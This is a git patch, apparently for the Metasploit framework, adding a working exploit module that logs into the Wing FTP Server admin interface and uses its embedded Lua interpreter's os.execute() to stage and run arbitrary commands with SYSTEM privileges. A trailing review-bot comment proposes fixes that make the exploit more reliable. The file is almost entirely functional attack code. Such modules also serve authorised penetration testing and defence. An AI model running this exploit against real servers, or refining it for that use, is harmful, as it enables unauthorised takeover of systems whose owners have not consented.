From 40b66fae33dbda2b27f102fcd60f33c3e2ebb918 Mon Sep 17 00:00:00 2001
From: Nicholas Nam
Date: Tue, 26 Aug 2014 07:28:41 -0700
Subject: [PATCH] Add Wing FTP Server post-auth remote command execution module
---
 .../windows/ftp/wing_ftp_server_rce.rb | 123 ++++++++++++++++++
 1 file changed, 123 insertions(+)
 create mode 100644 modules/exploits/windows/ftp/wing_ftp_server_rce.rb
diff --git a/modules/exploits/windows/ftp/wing_ftp_server_rce.rb b/modules/exploits/windows/ftp/wing_ftp_server_rce.rb
new file mode 100644
index 0000000000..b3c9df2c2c
--- /dev/null
+++ b/modules/exploits/windows/ftp/wing_ftp_server_rce.rb
@@ -0,0 +1,123 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+
+class Metasploit3 < Msf::Exploit::Remote
+ include REXML
+ include Msf::Exploit::CmdStager
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Wing FTP Server Remote Command Execution',
+ 'Description' => %q{
+ This module exploits the embedded Lua interpreter in the admin interface for
+ versions 4.3.8 and below. When supplying a specially crafted HTTP POST request
+ an attacker can use os.execute() to execute arbitrary system commands on
+ the target with SYSTEM privileges.
+ },
+ 'Author' =>
+ [
+ 'Nicholas Nam (nick[at]executionflow.org)',
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://www.wftpserver.com' ]
+ ],
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Windows VBS Stager', {} ]
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Jun 19 2014',
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(5466),
+ OptString.new('USERNAME', [true, 'Admin username', '']),
+ OptString.new('PASSWORD', [true, 'Admin password', ''])
+ ], self.class
+ )
+ deregister_options('CMDSTAGER::FLAVOR')
+ end
+
+ def check
+ res = send_request_cgi(
+ {
+ 'uri' => '/admin_login.html',
+ 'method' => 'GET',
+ })
+
+ if res and res.body =~ /Wing FTP Server Administrator/ and res.body =~ /2003-2014 wftpserver.com<\/b>/
+ return Exploit::CheckCode::Appears
+ end
+
+ return Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ username = datastore['USERNAME']
+ password = datastore['PASSWORD']
+ @session_cookie = authenticate(username, password)
+
+ print_status("#{peer} - Sending payload")
+ # Execute the cmdstager, max length of the commands is ~1500
+ execute_cmdstager({:flavor => :vbs, :linemax => 1500})
+ end
+
+ def execute_command(cmd, opts = {})
+ command = "os.execute('cmd /c #{cmd}')"
+
+ res = send_request_cgi({
+ 'uri' => '/admin_lua_script.html',
+ 'method' => 'POST',
+ 'cookie' => @session_cookie,
+ 'vars_post' => { 'command' => command }
+ })
+
+ if res and res.code != 200
+ fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
+ end
+ end
+
+ def authenticate(username, password)
+ print_status("#{peer} - Authenticating")
+ res = send_request_cgi({
+ 'uri' => '/admin_loginok.html',
+ 'method' => 'POST',
+ 'vars_post' => {
+ 'username' => username,
+ 'password' => password,
+ 'username_val' => username,
+ 'password_val' => password,
+ 'submit_btn' => '+Login+'
+ }
+ })
+
+ uidadmin = ''
+ if res and res.body =~ /location='main.html\?lang=english';/
+ res.get_cookies.split(';').each do |cookie|
+ cookie.split(',').each do |value|
+ if value.split('=')[0] =~ /UIDADMIN/
+ uidadmin = value.split('=')[1]
+ end
+ end
+ end
+ else
+ fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
+ end
+
+ return "UIDADMIN=#{uidadmin}"
+ end
+
+end
+
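Review bot: `execute_command` interpolates `cmd` straight into a single-quoted Lua literal, so a staged line that happens to contain `'` or `\` breaks the Lua script and the module only reports the generic `Something went wrong.`; escape before building the string, e.g. `lua_arg = cmd.gsub('\\') { '\\\\' }.gsub("'") { "\\'" }` followed by `command = "os.execute('cmd /c #{lua_arg}')"`. The same method treats a nil response (timeout) as success because of `if res and res.code != 200`, so a dropped connection lets the stager keep sending; `unless res && res.code == 200` is the intended check. In `authenticate`, a body that matches the redirect but carries no UIDADMIN cookie returns the bare `UIDADMIN=` and every later request fails with that same unhelpful message, so add `fail_with(Failure::Unknown, "#{peer} - UIDADMIN cookie not found") if uidadmin.empty?` before the return. As a point of style, `include REXML` and `require 'msf/core/exploit/powershell'` are not used anywhere in the module, and the `and` in the `if res and ...` conditions in `check`, `execute_command` and `authenticate` should be `&&` to avoid precedence surprises.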